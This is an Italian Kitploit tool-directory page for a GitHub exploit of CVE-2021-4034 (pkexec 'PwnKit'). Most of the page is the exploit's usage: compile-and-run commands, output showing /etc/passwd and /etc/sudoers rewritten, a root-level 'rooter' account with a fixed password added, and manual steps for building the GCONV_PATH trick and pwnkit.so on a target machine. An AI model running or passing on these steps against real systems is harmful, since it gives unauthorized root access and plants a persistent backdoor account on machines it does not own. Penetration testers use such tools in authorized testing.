Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-4034 — Exploit per CVE-2021-4034 (pkexec) che aggiunge un utente root con privilegi sudo. Include passaggi di sfruttamento manuale e compila pwnkit.so per l'escalation dei privilegi locale. | Kitploit
Strumenti/GitHubGitHub/rvn0xsy/cve-2021-4034
Escalation di PrivilegiFramework di ExploitAnalisi delle VulnerabilitàExploit
GitHubrvn0xsy/cve-2021-4034

CVE-2021-4034

Exploit per CVE-2021-4034 (pkexec) che aggiunge un utente root con privilegi sudo. Include passaggi di sfruttamento manuale e compila pwnkit.so per l'escalation dei privilegi locale.

Vedi Repository
97164 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-4034

CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation

Basato su CVE-2021-4034 è stato potenziato: l'esecuzione dell'Exploit aggiungerà per impostazione predefinita il nome utente rooter, la password Hello@World, e l'utente rooter avrà privilegi sudo.

Fare riferimento a CVE-2021-4034: eseguendo Exploit verrà aggiunto il nome utente rooter, la password Hello@World per impostazione predefinita, e l'utente rooter avrà privilegi sudo.

Usage

root@kitploit:~

test@some:~$ gcc cve-2021-4034.c -o ./exp
test@some:~$ ./exp
/etc/passwd successfully backed up to /tmp/passwd.bak
File Open successed!

[+]Change sudoers priv.
/etc/sudoers successfully backed up to /tmp/sudoers.bak
File Open successed!

[+]Add Root User Success...
test@some:~$ su rooter
Password:
root@some:/home/test# id
uid=0(root) gid=0(root) groups=0(root)
root@some:/home/test#

Escalation manuale

Se l'ambiente di destinazione non dispone di gcc, è possibile eseguire manualmente i comandi e compilare pwnkit.so localmente.

Creare l'ambiente di sfruttamento - macchina di destinazione

root@kitploit:~
$ mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'
$ mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules

Compilare pwnkit.so e pkexec - localmente

root@kitploit:~
$ mkdir pwnkit
$ gcc pwnkit.so.c -o pwnkit/pwnkit.so -lcrypt -shared -fPIC
$ gcc pkexec.c -o pkexec

Eseguire Exploit

  1. Caricare la cartella pwnkit sulla macchina di destinazione
  2. Caricare pkexec sulla macchina di destinazione
  3. Eseguire pkexec
root@kitploit:~
$ ./pkexec
/etc/passwd successfully backed up to /tmp/passwd.bak
File Open successed!

[+]Change sudoers priv.
/etc/sudoers successfully backed up to /tmp/sudoers.bak
File Open successed!

[+]Add Root User Success...
Scarica lo strumento